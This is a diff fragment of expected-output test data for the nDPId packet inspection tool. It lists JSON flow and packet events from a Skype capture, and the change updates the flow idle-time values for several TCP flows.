01117{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1431969657029,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969657029,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISJhIAAEARzh3AqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 
00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGANAAEAGj4bAqAEinTg0LMNwnGCx3l8+AAAAALAC\/\/8vJgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2l9AAEAGyKzAqAEinTc4qsNxnE+r6BKEAAAAALAC\/\/99aQAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwhRAAEAGlxXAqAEinTeCjMNynGH\/hzWiAAAAALAC\/\/+8tgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGANAAEAGj4bAqAEinTg0LMNwnGCx3l8+AAAAALAC\/\/8vJgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2l9AAEAGyKzAqAEinTc4qsNxnE+r6BKEAAAAALAC\/\/99aQAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwhRAAEAGlxXAqAEinTeCjMNynGH\/hzWiAAAAALAC\/\/+8tgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/NlsAAEARxRrAqAEib91NkTLdnFsAK6mBm7oCyq7Iy7cmxwvThWDRoZOMl0+28C1BuPbRnMjSw2j4JUc="} 
00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -209,14 +209,14 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1431969657368,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969657368,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5GS4AAEAR4kXAqAEib91NmTLdnFgAJQIPm8ICkS16B313b791pcC\/iQ60uf4KWNmYdYf5eCQ="} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1431969657498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657498,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYi6dN4KMwKgBIpxhw3JnDsNv\/4c1o6ASOJAm+AAAAgQFrAQCCApOvfTqPiLFlwEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1431969657498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z75AAEAGiXfAqAEinTeCjMNynGH\/hzWjZw7DcIAQECx9oAAAAQEICj4ixhlOvfTq"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1431969657511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657511,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBCdNziqwKgBIpxPw3E+7utRq+gShaASOJAwmQAAAgQFrAQCCApNea1+PiLFlwEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1431969657511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657511,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wcBAAEAG4VfAqAEinTc4qsNxnE+r6BKFPu7rUoAQECyHNAAAAQEICj4ixiZNea1+"} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1431969657579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657579,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIpxgw3AfJGVIsd5fP6ASOJAHOgAAAgQFrAQCCApMZC+DPiLFlwEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1431969657579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657579,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04EdAAEAGx03AqAEinTg0LMNwnGCx3l8\/HyRlSYAQECxdkgAAAQEICj4ixmlMZC+D"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQSRAAEAGrlLAqAEi1cezr8NznFXnJeTHAAAAALAC\/\/+4YAAAAgQFtAEDAwUBAQgKPiLJgQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1431969657498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657498,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYi6dN4KMwKgBIpxhw3JnDsNv\/4c1o6ASOJAm+AAAAgQFrAQCCApOvfTqPiLFlwEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1431969657498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z75AAEAGiXfAqAEinTeCjMNynGH\/hzWjZw7DcIAQECx9oAAAAQEICj4ixhlOvfTq"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1431969657511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657511,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBCdNziqwKgBIpxPw3E+7utRq+gShaASOJAwmQAAAgQFrAQCCApNea1+PiLFlwEDAwk="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1431969657511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657511,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wcBAAEAG4VfAqAEinTc4qsNxnE+r6BKFPu7rUoAQECyHNAAAAQEICj4ixiZNea1+"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1431969657579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657579,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIpxgw3AfJGVIsd5fP6ASOJAHOgAAAgQFrAQCCApMZC+DPiLFlwEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1431969657579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657579,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04EdAAEAGx03AqAEinTg0LMNwnGCx3l8\/HyRlSYAQECxdkgAAAQEICj4ixmlMZC+D"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQSRAAEAGrlLAqAEi1cezr8NznFXnJeTHAAAAALAC\/\/+4YAAAAgQFtAEDAwUBAQgKPiLJgQAAAAAEAgAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QmIAAEARVi\/AqAEiQTffJjLdnE8AIJ1Im8QCCqRVDPPz90033q\/EDoSNqvvC54ua"} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -232,20 +232,20 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4VhMAAEARqOnAqAEib91KETLdnFYAJFy+m8wCfUg82Gg6DnsozSUd0tlDoiZPS7EFljPm7g=="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1431969658463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969658463,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxVw3Nt\/WNx5yXkyKASOJA3OAAAAgQFrAQCCApO2zlGPiLJgQEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1431969658464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969658464,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kRFAAEAGXnHAqAEi1cezr8NznFXnJeTIbf1jcoAQECyOCgAAAQEICj4iydlO2zlG"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658978,"flow_last_seen":1431969658978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658978,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
